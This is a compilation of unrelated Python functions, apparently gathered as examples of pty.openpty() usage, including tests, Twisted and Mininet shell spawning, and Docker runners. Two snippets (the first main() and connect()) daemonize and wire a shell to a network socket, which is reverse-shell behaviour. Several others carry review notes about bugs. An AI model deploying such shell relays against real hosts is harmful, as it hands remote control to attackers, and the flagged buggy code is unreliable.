def main():
    """Relay data between an established connection and a shell on a pty.

    Obtains a connection from ``establish_connection()``, calls
    ``daemonize()``, starts ``SHELL`` attached to the slave side of a new
    pseudo-terminal, writes ``FIRST_COMMAND`` to it and then copies data in
    both directions until the shell exits or the peer closes the connection.
    The connection is always closed on the way out.

    :return: -1 when no connection could be established, otherwise None.
    """
    s = establish_connection()
    if s is None:
        return -1
    print(success("Connection established!"))
    daemonize()

    master, slave = pty.openpty()
    bash = subprocess.Popen(
        SHELL,
        preexec_fn=os.setsid,
        stdin=slave,
        stdout=slave,
        stderr=slave,
        universal_newlines=True,
    )
    time.sleep(1)  # Wait for bash to start before sending data to it.
    os.write(master, "%s\n" % FIRST_COMMAND)

    try:
        while bash.poll() is None:
            readable, _, _ = select.select([s, master], [], [])
            if s in readable:
                # SSLSockets don't play nice with select because they buffer
                # data internally, so everything pending is drained below.
                # Code taken from
                # https://stackoverflow.com/questions/3187565/select-and-ssl-in-python.
                try:
                    data = s.recv(1024)
                except ssl.SSLError as err:
                    if err.errno != ssl.SSL_ERROR_WANT_READ:
                        raise
                    continue
                if not data:  # End of file.
                    break
                while True:
                    pending = s.pending()
                    if not pending:
                        break
                    data += s.recv(pending)
                os.write(master, data)
            elif master in readable:
                s.write(os.read(master, 2048))
    finally:
        s.close()
# Python example source code using pty.openpty()
def test_rip_error(request, tmpdir):
    """Verify error handling when a rip fails part-way through.

    The ISO is truncated once the ripper reports that it is analyzing
    segments; the run must then exit non-zero and report failed titles.

    :param request: pytest fixture.
    :param py.path.local tmpdir: pytest fixture.
    """
    # Work on a private copy of the sample ISO so it can be truncated later.
    iso = tmpdir.join('truncated.iso')
    py.path.local(__file__).dirpath().join('sample.iso').copy(iso)

    # Load the ISO.
    pytest.cdload(iso)

    # Build and launch the command with a pty on stdin.
    output = tmpdir.ensure_dir('output')
    command = [
        'docker', 'run', '--device=/dev/cdrom',
        '-v', '{}:/output'.format(output),
        '-e', 'DEBUG=true',
        'robpol86/makemkv',
    ]
    master, slave = pty.openpty()
    request.addfinalizer(lambda: [os.close(master), os.close(slave)])
    proc = subprocess.Popen(
        command,
        bufsize=1,
        cwd=HERE,
        stderr=subprocess.STDOUT,
        stdin=slave,
        stdout=subprocess.PIPE,
    )

    # Consume output until the process has exited and the pipe is empty.
    caught = False
    while proc.poll() is None or proc.stdout.peek(1):
        for line in proc.stdout:
            if b'Analyzing seamless segments' in line:
                # Truncate the ISO underneath the running rip.
                iso.open('w').close()
            elif b'ERROR: One or more titles failed.' in line:
                caught = True
            print(line)  # Write to stdout, pytest will print if test fails.

    # Verify.
    assert proc.poll() > 0
    assert caught is True
    pytest.verify_failed_file(output)
def test_run_colored_output(self):
    """Check that ``cli.run`` emits ANSI-colored output when stdout is a TTY.

    ``sys.stdout`` and ``sys.stderr`` are temporarily pointed at the slave
    side of a pseudo-terminal; the text is then read back from the master
    side and compared with the expected escape sequences.
    """
    path = os.path.join(self.wd, 'a.yaml')

    # Create a pseudo-TTY and redirect stdout/stderr to it.
    master, slave = pty.openpty()
    tty_out = os.fdopen(slave, 'w')
    output = os.fdopen(master, 'r')
    saved_streams = sys.stdout, sys.stderr
    sys.stdout = sys.stderr = tty_out
    try:
        with self.assertRaises(SystemExit) as ctx:
            cli.run((path, ))
        sys.stdout.flush()

        self.assertEqual(ctx.exception.code, 1)

        # Read output from the TTY without blocking once it is drained.
        # F_GETFL (not F_GETFD) is the counterpart of F_SETFL: the file
        # status flags must be read before O_NONBLOCK is OR-ed into them.
        flag = fcntl.fcntl(master, fcntl.F_GETFL)
        fcntl.fcntl(master, fcntl.F_SETFL, flag | os.O_NONBLOCK)

        out = output.read().replace('\r\n', '\n')
    finally:
        # Always restore the real streams so later code does not write to a
        # closed pseudo-terminal, then release both ends of the pty.
        sys.stdout, sys.stderr = saved_streams
        tty_out.close()
        output.close()

    self.assertEqual(out, (
        '\033[4m%s\033[0m\n'
        ' \033[2m2:4\033[0m \033[31merror\033[0m '
        'trailing spaces \033[2m(trailing-spaces)\033[0m\n'
        ' \033[2m3:4\033[0m \033[31merror\033[0m '
        'no new line character at the end of file '
        '\033[2m(new-line-at-end-of-file)\033[0m\n'
        '\n' % path))
def launch_textmode_app(self, executable, name):
    """Run a text-mode program and show its output in a modal dialog.

    The program's stdout and stderr are attached to the slave side of a new
    pseudo-terminal; the dialog is handed the process and the master side.

    :param executable: program to start; converted with ``str()``.
    :param name: passed to ``TextmodeDialog`` together with ``self.w``.
    """
    dialog = TextmodeDialog(name, self.w)
    self.app_executable = executable
    master_fd, slave_fd = pty.openpty()
    try:
        self.app_process = subprocess.Popen(
            str(executable), stdout=slave_fd, stderr=slave_fd)
        dialog.poll(self.app_process, master_fd)
        dialog.exec_()
    finally:
        # Release the pty even when spawning or the dialog raises.
        os.close(master_fd)
        os.close(slave_fd)
def __init__(self, hci_device_number=0, logger=None, events_config=None):
    """Set up the HCI socket and a pseudo-terminal attached via ``hciattach``.

    Runs ``hciconfig <device> down``, creates the HCI socket through
    ``create_bt_socket_hci_channel_user``, allocates a pty and runs
    ``hciattach`` on the slave's tty name.

    :param hci_device_number: number handed to the HCI socket factory.
    :param logger: logger to use; falls back to this module's logger.
    :param events_config: forwarded to ``EventParser`` as ``config``.
    :raises subprocess.CalledProcessError: when ``hciconfig`` or
        ``hciattach`` exits with a non-zero status.
    """
    self._logger = logger if logger else logging.getLogger(__name__)
    self._event_parser = EventParser(config=events_config, logger=self._logger)
    self._agent_events_sender = AgentEventsSender(logger=self._logger)
    self._hci_device_number = hci_device_number

    down_cmd = ['hciconfig', self.hci_device_name, 'down']
    try:
        subprocess.check_call(down_cmd)
    except subprocess.CalledProcessError:
        self._logger.error('Could not run hciconfig down command for HCI device')
        raise

    self._hci_socket = create_bt_socket_hci_channel_user(hci_device_number)
    self._logger.info('bind to %s complete', self.hci_device_name)

    # NOTE(review): the slave descriptor is never closed here, and mode
    # 'rwb' is not accepted by Python 3's os.fdopen -- confirm both.
    self._pty_master, slave_fd = pty.openpty()
    self._pty_fd = os.fdopen(self._pty_master, 'rwb')
    hci_tty = os.ttyname(slave_fd)
    self._logger.debug('TTY slave for the virtual HCI: %s', hci_tty)

    attach_cmd = ['hciattach', hci_tty, 'any']
    try:
        subprocess.check_call(attach_cmd)
    except subprocess.CalledProcessError:
        self._logger.error('Could not run hciattach on PTY device')
        raise

    self._inputs = [self._pty_fd, self._hci_socket]
    self._pty_buffer = StringIO()  # Used as a seekable stream
    self._gatt_logger = GattLogger(self._logger)
    self._should_stop = False
def getPty(self, term, windowSize, modes):
    """Allocate a pseudo-terminal and record the terminal settings.

    Stores ``term`` as ``TERM`` and the slave's tty name as ``SSH_TTY`` in
    ``self.environ``, keeps ``windowSize`` and ``modes`` on the instance, and
    saves ``(master, slave, ttyname)`` as ``self.ptyTuple``.
    """
    self.environ['TERM'] = term
    self.winSize = windowSize
    self.modes = modes
    master_fd, slave_fd = pty.openpty()
    tty_path = os.ttyname(slave_fd)
    self.environ['SSH_TTY'] = tty_path
    self.ptyTuple = (master_fd, slave_fd, tty_path)
def setUp(self):
    """Open a pseudo-terminal pair and keep both descriptors on the instance."""
    pair = pty.openpty()
    self.master, self.slave = pair
def connect(host, port, disable_encryption = False):
    """Connect to ``host:port`` over SCTP and attach ``$SHELL`` to the link.

    With ``disable_encryption`` the shell's stdin/stdout are file objects
    made from the socket. Otherwise the socket is wrapped with TLSv1, a
    greeting is sent, and the shell writes to a pseudo-terminal whose master
    side is made non-blocking. The streams are then handed to
    ``process_connection`` and the socket is closed.
    """
    sock = sctp_socket(family = socket.AF_INET)
    sock.connect((host, port))
    shell_path = os.environ["SHELL"]

    if disable_encryption:
        std_out = sock.sock().makefile("w")
        std_in = sock.sock().makefile()
        shell = Popen(shell_path,
                      stdin = std_in,
                      stdout = std_out,
                      shell = True)
    else:
        ssl_sock = ssl.wrap_socket(sock.sock(),
                                   ssl_version = ssl.PROTOCOL_TLSv1)
        ssl_sock.send("Hi! This is the client. You're connected.\n")

        # This pipe is created but not used further in this function.
        read_end, write_end = os.pipe()
        std_in = os.fdopen(read_end, "r")
        std_out = os.fdopen(write_end, "w")

        # Set our shell up to use pty, and make the output non-blocking.
        master, slave = pty.openpty()
        shell = Popen(shell_path,
                      stdin = PIPE,
                      stdout = slave,
                      shell = True)
        shell.stdout = os.fdopen(os.dup(master), "r+")
        out_fd = shell.stdout.fileno()
        flags = fcntl.fcntl(out_fd, fcntl.F_GETFL)
        fcntl.fcntl(out_fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)

    # NOTE(review): ssl_sock is only bound in the encrypted branch, so this
    # call raises NameError when disable_encryption is true. The nesting of
    # these last two statements was reconstructed -- confirm the intent.
    process_connection(ssl_sock, shell.stdin, shell.stdout, disable_encryption)
    sock.close()
def __start_proc(self):
    """Start ``self.elf_path`` on a raw pseudo-terminal.

    The child's stdin, stdout and stderr are the slave side of the pty;
    ``self.proc.stdin``/``stdout``/``stderr`` are replaced by file objects on
    duplicates of the master side, and the stdout one is made non-blocking.

    For background see
    http://rachid.koucha.free.fr/tech_corner/pty_pdip.html
    """
    # Open a new pty and put both ends into raw mode.
    master, slave = pty.openpty()
    for end in (master, slave):
        tty.setraw(end)

    # Bind the slave side to the subprocess.
    self.proc = Popen(self.elf_path,
                      stdin=slave,
                      stdout=slave,
                      stderr=slave,
                      close_fds=True,
                      preexec_fn=self.preexec_fn,
                      env=self.env,
                      shell=True
                      )
    self.pid = self.proc.pid
    print('[+] Start pid : %d' % self.pid)

    # Bind the master side to our own file objects, one duplicate each.
    for stream_name in ('stdin', 'stdout', 'stderr'):
        setattr(self.proc, stream_name, os.fdopen(os.dup(master), "r+"))

    # The original descriptors are no longer needed.
    os.close(slave)
    os.close(master)

    # Switch the output stream to non-blocking mode.
    out_fd = self.proc.stdout.fileno()
    flags = fcntl.fcntl(out_fd, fcntl.F_GETFL)
    fcntl.fcntl(out_fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def test_posix_printengine_tty(self):
    """Test POSIX print engine tty mode."""
    sio = six.StringIO()

    def __drain(masterf):
        """Read full chunks from masterf into sio until a short read."""
        chunksz = 1024
        while True:
            termdata = masterf.read(chunksz)
            if len(termdata) < chunksz:
                # assume we hit EOF
                break
            # NOTE(review): placement inside the loop was reconstructed
            # from a paste without indentation -- confirm.
            print(termdata, file=sio)

    #
    # - Allocate a pty
    # - Create a thread to drain off the master side; without
    #   this, the slave side will block when trying to write.
    # - Connect the printengine to the slave side
    # - Set it running
    #
    master, slave = pty.openpty()
    slavef = os.fdopen(slave, "w")
    masterf = os.fdopen(master, "r")

    drainer = threading.Thread(target=__drain, args=(masterf,))
    drainer.start()

    printengine.test_posix_printengine(slavef, True)
    slavef.close()

    drainer.join()
    masterf.close()
    self.assertTrue(len(sio.getvalue()) > 0)
def __t_pty_tracker(self, trackerclass, **kwargs):
    """Run a progress tracker whose output file is the slave side of a pty.

    :param trackerclass: callable invoked as
        ``trackerclass(output_file=<slave file>, **kwargs)``.
    """
    def __drain(masterf):
        """Read and discard chunks from masterf until a short read."""
        chunksz = 1024
        while True:
            termdata = masterf.read(chunksz)
            if len(termdata) < chunksz:
                # assume we hit EOF
                break

    #
    # - Allocate a pty
    # - Create a thread to drain off the master side; without
    #   this, the slave side will block when trying to write.
    # - Connect the prog tracker to the slave side
    # - Set it running
    #
    master, slave = pty.openpty()
    slavef = os.fdopen(slave, "w")
    masterf = os.fdopen(master, "rb")

    drainer = threading.Thread(target=__drain, args=(masterf,))
    drainer.start()

    tracker = trackerclass(output_file=slavef, **kwargs)
    progress.test_progress_tracker(tracker, gofast=True)
    slavef.close()

    drainer.join()
    masterf.close()
def startShell(self, mnopts=None):
    """Start the node's shell inside a fresh ``docker run`` container.

    Stops any existing shell, builds the ``docker run`` command line from
    ``self.name``, ``self.port_map``, ``self.fs_map`` and
    ``self.docker_image``, runs it on a pseudo-terminal, and records the
    container's init pid from ``docker inspect`` in ``self.pid``.

    :param mnopts: accepted but not used by this implementation.
    :raises ValueError: if ``docker inspect`` does not print a pid.
    """
    self.stop()

    args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
    args.extend(['--hostname=' + self.name, '--name=' + self.name])
    args.extend(['-e', 'DISPLAY'])
    args.extend(['-v', '/tmp/.X11-unix:/tmp/.X11-unix:ro'])
    print(self.port_map)
    if self.port_map is not None:
        for p in self.port_map:
            args.extend(['-p', '%d:%d' % (p[0], p[1])])
    if self.fs_map is not None:
        for f in self.fs_map:
            args.extend(['-v', '%s:%s' % (f[0], f[1])])
    args.extend([self.docker_image])

    master, slave = pty.openpty()
    self.shell = subprocess.Popen(
        args,
        stdin=slave,
        stdout=slave,
        stderr=slave,
        close_fds=True,
        preexec_fn=os.setpgrp)
    os.close(slave)

    ttyobj = os.fdopen(master, 'rw')
    self.stdin = ttyobj
    self.stdout = ttyobj
    self.pid = self.shell.pid
    self.pollOut = select.poll()
    self.pollOut.register(self.stdout)
    self.outToNode[self.stdout.fileno()] = self
    self.inToNode[self.stdin.fileno()] = self
    self.execed = False
    self.lastCmd = None
    self.lastPid = None
    self.readbuf = ''
    self.waiting = False

    # Wait for prompt
    time.sleep(1)

    pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'',
               self.name]
    pidp = subprocess.Popen(
        pid_cmd,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        close_fds=False)
    # communicate() drains the pipe while waiting and closes the unused
    # stdin pipe; wait() followed by a read can stall on a full pipe.
    inspect_out, _ = pidp.communicate()
    first_line = inspect_out.splitlines()[0]
    if not isinstance(first_line, str):
        first_line = first_line.decode()
    # The command runs without a shell, so the quotes in --format reach
    # docker literally and come back around the pid; strip them before int().
    self.pid = int(first_line.strip().strip("'"))

    self.cmd('export PS1=\"\\177\"; printf "\\177"')
    self.cmd('stty -echo; set +m')
def run(command=None, args=None, output=None, image_id=None, environ=None, cwd=None):
    """Run a command and return the output. Supports string and py.path paths.

    When ``command`` starts with ``bash`` or ``docker`` a pseudo-terminal is
    supplied as stdin so 'docker run -it' doesn't complain. ``docker``
    commands get a 120 second timeout, everything else 30 seconds.

    :raise CalledProcessError: Command exits non-zero.

    :param iter command: Command to run.
    :param iter args: List of command line arguments to insert to command
        (placed before its last element).
    :param str output: Path to bind mount to /output when `command` is None.
    :param str image_id: Docker image to use instead of robpol86/makemkv.
    :param dict environ: Environment variables to set/override in the command.
    :param str cwd: Current working directory. Default is tests directory.

    :return: Command stdout and stderr output.
    :rtype: tuple
    """
    if command is None:
        command = ['docker', 'run', '--device=/dev/cdrom', '-e', 'DEBUG=true', image_id or 'robpol86/makemkv']
        if output:
            command = command[:-1] + ['-v', '{}:/output'.format(output)] + command[-1:]
    if args:
        command = command[:-1] + list(args) + command[-1:]

    env = os.environ.copy()
    if environ:
        env.update(environ)

    # Simulate stdin pty so 'docker run -it' doesn't complain. None (not 0)
    # marks "no pty", because 0 is itself a valid file descriptor number.
    master = slave = None
    if command[0] in ('bash', 'docker'):
        master, slave = pty.openpty()

    # Determine timeout.
    timeout = 120 if command[0] == 'docker' else 30

    # Run command.
    try:
        result = subprocess.run(
            [str(i) for i in command], check=True, cwd=cwd or HERE, env=env,
            stderr=subprocess.PIPE, stdin=slave, stdout=subprocess.PIPE,
            timeout=timeout
        )
    finally:
        if slave is not None:
            os.close(slave)
        if master is not None:
            os.close(master)

    return result.stdout, result.stderr
def runShell(script, env=None, cwd="/", user=None, base64_encode=False):
    """Run a shell script on a pseudo-terminal and collect its output.

    The script runs through ``bash -c``, or through ``su <user> -c`` when
    ``user`` is given and differs from the current user. stdout and stderr
    are both read from the master side of the pty.

    :param script: script text; an empty or None script is a no-op.
    :param env: environment passed to the child process.
    :param cwd: working directory of the child process.
    :param user: account to run the script as.
    :param base64_encode: when true, ``script`` is base64-decoded first.
    :return: ``(status, output)``. ``(0, "")`` for an empty script and
        ``(1, <error text>)`` when the process could not be started.
    """
    import errno
    import pwd
    import pty

    # check script
    if not script:
        return 0, ""

    master_fd = slave_fd = None
    try:
        # base64 decode
        if base64_encode:
            decode_script = base64.decodestring(script)
        else:
            decode_script = script

        # check user
        logger.info(decode_script)
        cur_user = pwd.getpwuid(os.getuid())[0]
        if not user or user == cur_user:
            shell_list = ["bash", "-c", decode_script.encode('utf8')]
        else:
            shell_list = ["su", user, "-c", decode_script.encode('utf8'), "-s", "/bin/bash"]

        master_fd, slave_fd = pty.openpty()
        proc = Popen(shell_list, shell=False, universal_newlines=True, bufsize=1,
                     stdout=slave_fd, stderr=STDOUT, env=env, cwd=cwd, close_fds=True)
    except Exception as e:
        logger.error(e)
        # Do not leak the pty when the process could not be spawned.
        for fd in (slave_fd, master_fd):
            if fd is not None:
                os.close(fd)
        return (1, str(e))

    timeout = .1
    chunks = []
    try:
        while True:
            try:
                ready, _, _ = gs.select([master_fd], [], [], timeout)
            except gs.error as ex:
                # Retry when the wait was merely interrupted by a signal.
                if ex.args[0] == errno.EINTR:
                    continue
                raise
            if ready:
                data = os.read(master_fd, 512)
                chunks.append(data)
                if not data:
                    break
            elif proc.poll() is not None:
                # Nothing left to read and the child has exited.
                break
    finally:
        os.close(slave_fd)
        os.close(master_fd)

    proc.wait()
    return (proc.returncode, ''.join(chunks))
def __init__(self, reactor, executable, args, environment, path, proto,
             uid=None, gid=None, usePTY=None):
    """
    Spawn an operating-system process attached to a pseudo-terminal.

    The fork/exec work is delegated to C{self._fork}, which is given the
    master and slave descriptors. C{uid} and C{gid} are passed through to
    it as well.

    If C{usePTY} is a tuple or list it is unpacked as
    C{(masterfd, slavefd, <ignored>)} and those descriptors are used;
    otherwise a new pair is opened with C{pty.openpty}.

    @raise NotImplementedError: if the C{pty} module is unavailable and no
        descriptors were supplied through C{usePTY}.
    """
    ptySupplied = isinstance(usePTY, (tuple, list))
    if pty is None and not ptySupplied:
        # no pty module and we didn't get a pty to use
        raise NotImplementedError(
            "cannot use PTYProcess on platforms without the pty module.")

    abstract.FileDescriptor.__init__(self, reactor)
    _BaseProcess.__init__(self, proto)

    if ptySupplied:
        masterfd, slavefd, _ = usePTY
    else:
        masterfd, slavefd = pty.openpty()

    try:
        self._fork(path, uid, gid, executable, args, environment,
                   masterfd=masterfd, slavefd=slavefd)
    except:
        # Only descriptors opened here are closed; supplied ones are left
        # to the caller.
        if not ptySupplied:
            os.close(masterfd)
            os.close(slavefd)
        raise

    # we are now in parent process:
    os.close(slavefd)
    fdesc.setNonBlocking(masterfd)
    self.fd = masterfd
    self.startReading()
    self.connected = 1
    self.status = -1
    try:
        self.proto.makeConnection(self)
    except:
        log.err()
    registerReapProcessHandler(self.pid, self)
def _setupChild(self, masterfd, slavefd):
    """
    Prepare the child process after C{fork()} and before C{exec()}.

    In order, this:
        - closes C{masterfd}
        - starts a new session with C{os.setsid}
        - issues the C{TIOCSCTTY} ioctl on C{slavefd}
        - closes descriptors 0-2 (except C{slavefd} itself) and duplicates
          C{slavefd} onto standard input, output, and error
        - closes every descriptor above 2 reported by L{_listOpenFDs}
        - calls C{self._resetSignalDisposition}

    @param masterfd: The master end of a PTY opened with C{openpty}.
    @type masterfd: L{int}

    @param slavefd: The slave end of a PTY opened with C{openpty}.
    @type slavefd: L{int}
    """
    os.close(masterfd)
    os.setsid()
    fcntl.ioctl(slavefd, termios.TIOCSCTTY, '')

    standardFDs = (0, 1, 2)  # stdin, stdout, stderr
    for stdFD in standardFDs:
        if stdFD != slavefd:
            os.close(stdFD)
    for stdFD in standardFDs:
        os.dup2(slavefd, stdFD)

    for openFD in _listOpenFDs():
        if openFD <= 2:
            continue
        try:
            os.close(openFD)
        except:
            pass

    self._resetSignalDisposition()
def _execute_process_pty(cmd, cwd, env, shell, stderr_to_stdout=True):
    """Start ``cmd`` on pseudo-terminals and hand its output to ``_yield_data``.

    One pty is always opened; a second one is opened when
    ``stderr_to_stdout`` is false. The child's stdin is the first pty's
    slave, and both its stdout and stderr go to ``stderr_slave``.

    :param cmd: command passed to ``Popen``.
    :param cwd: working directory for the child.
    :param env: environment for the child.
    :param shell: forwarded to ``Popen`` as ``shell``.
    :param stderr_to_stdout: when true, a single pty is shared.
    :return: whatever ``_yield_data`` returns.
    :raises OSError: if the process cannot be started, except for the
        transient 'Text file busy' case, which is retried.
    """
    stdout_master, stdout_slave = None, None
    stderr_master, stderr_slave = None, None
    # NOTE(review): this list is built while every descriptor is still None,
    # so _yield_data receives four None entries. It is passed on unchanged
    # because _yield_data's contract is not visible here -- confirm whether
    # the master descriptors were meant to be handed over for closing.
    fds_to_close = [stdout_master, stdout_slave, stderr_master, stderr_slave]
    opened = []  # descriptors that are actually open right now
    try:
        stdout_master, stdout_slave = pty.openpty()
        opened.extend((stdout_master, stdout_slave))
        if stderr_to_stdout:
            stderr_master, stderr_slave = stdout_master, stdout_slave
        else:
            stderr_master, stderr_slave = pty.openpty()
            opened.extend((stderr_master, stderr_slave))

        p = None
        while p is None:
            try:
                p = Popen(
                    cmd,
                    stdin=stdout_slave, stdout=stderr_slave, stderr=STDOUT,
                    cwd=cwd, env=env, shell=shell, close_fds=False)
            except OSError as exc:
                # This can happen if a file you are trying to execute is being
                # written to simultaneously on Linux
                # (doesn't appear to happen on OS X)
                # It seems like the best strategy is to just try again later
                # Worst case is that the file eventually gets deleted, then a
                # different OSError would occur.
                if 'Text file busy' in '{0}'.format(exc):
                    # This is a transient error, try again shortly
                    time.sleep(0.01)
                    continue
                raise

        # This causes the below select to exit when the subprocess closes.
        # On Linux, this sometimes causes Errno 5 OSError's when os.read
        # is called from within _yield_data, so on Linux _yield_data
        # catches and passes on that particular OSError.
        os.close(stdout_slave)
        opened.remove(stdout_slave)
        if not stderr_to_stdout:
            os.close(stderr_slave)
            opened.remove(stderr_slave)

        left_overs = {stdout_master: b'', stderr_master: b''}

        fds = [stdout_master]
        if stderr_master != stdout_master:
            fds.append(stderr_master)
    except BaseException:
        # Make sure we don't leak file descriptors when setup fails.
        for fd in opened:
            try:
                os.close(fd)
            except OSError:
                pass
        raise

    # The linesep with pty's always seems to be "\r\n", even on OS X
    return _yield_data(p, fds, left_overs, "\r\n", fds_to_close)
def startShell( self, mnopts=None ):
    """Start a shell process for running commands.
       mnopts: option string for mnexec; defaults to '-cd'"""
    if self.shell:
        error( "%s: shell is already running\n" % self.name )
        return
    sentinel = chr( 127 )  # prompt character used to detect readiness
    # mnexec: (c)lose descriptors, (d)etach from tty,
    # (p)rint pid, and run in (n)amespace
    opts = mnopts if mnopts is not None else '-cd'
    if self.inNamespace:
        opts += 'n'
    # bash -i: force interactive
    # -s: pass $* to shell, and make process easy to find in ps
    # prompt is set to the sentinel
    cmd = [ 'mnexec', opts, 'env', 'PS1=' + sentinel,
            'bash', '--norc', '-is', 'mininet:' + self.name ]
    # Spawn a shell subprocess in a pseudo-tty, to disable buffering
    # in the subprocess and insulate it from signals (e.g. SIGINT)
    # received by the parent
    master, slave = pty.openpty()
    self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave,
                              close_fds=False )
    # One file object on the master side serves as both stdin and stdout
    self.stdin = os.fdopen( master, 'rw' )
    self.stdout = self.stdin
    self.pid = self.shell.pid
    self.pollOut = select.poll()
    self.pollOut.register( self.stdout )
    # Maintain mapping between file descriptors and nodes
    # This is useful for monitoring multiple nodes
    # using select.poll()
    self.outToNode[ self.stdout.fileno() ] = self
    self.inToNode[ self.stdin.fileno() ] = self
    self.execed = False
    self.lastCmd = None
    self.lastPid = None
    self.readbuf = ''
    # Wait for prompt: keep reading until the data ends with the sentinel
    while self.read( 1024 )[ -1 ] != sentinel:
        self.pollOut.poll()
    self.waiting = False
    # +m: disable job control notification
    self.cmd( 'unset HISTFILE; stty -echo; set +m' )
def startShell( self, *args, **kwargs ):
    """Start a shell process for running commands, via 'docker exec'.
       args, kwargs: accepted but not used here"""
    if self.shell:
        error( "%s: shell is already running\n" % self.name )
        return
    sentinel = chr( 127 )  # prompt character used to detect readiness
    container = '%s.%s' % ( self.dnameprefix, self.name )
    # bash -i: force interactive
    # -s: pass $* to shell, and make process easy to find in ps
    # prompt is set to the sentinel
    cmd = [ 'docker', 'exec', '-it', container, 'env', 'PS1=' + sentinel,
            'bash', '--norc', '-is', 'mininet:' + self.name ]
    # Spawn a shell subprocess in a pseudo-tty, to disable buffering
    # in the subprocess and insulate it from signals (e.g. SIGINT)
    # received by the parent
    master, slave = pty.openpty()
    self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave,
                              close_fds=False )
    # One file object on the master side serves as both stdin and stdout
    self.stdin = os.fdopen( master, 'rw' )
    self.stdout = self.stdin
    self.pid = self._get_pid()
    self.pollOut = select.poll()
    self.pollOut.register( self.stdout )
    # Maintain mapping between file descriptors and nodes
    # This is useful for monitoring multiple nodes
    # using select.poll()
    self.outToNode[ self.stdout.fileno() ] = self
    self.inToNode[ self.stdin.fileno() ] = self
    self.execed = False
    self.lastCmd = None
    self.lastPid = None
    self.readbuf = ''
    # Wait for prompt: keep reading until the data ends with the sentinel
    while self.read( 1024 )[ -1 ] != sentinel:
        self.pollOut.poll()
    self.waiting = False
    # +m: disable job control notification
    self.cmd( 'unset HISTFILE; stty -echo; set +m' )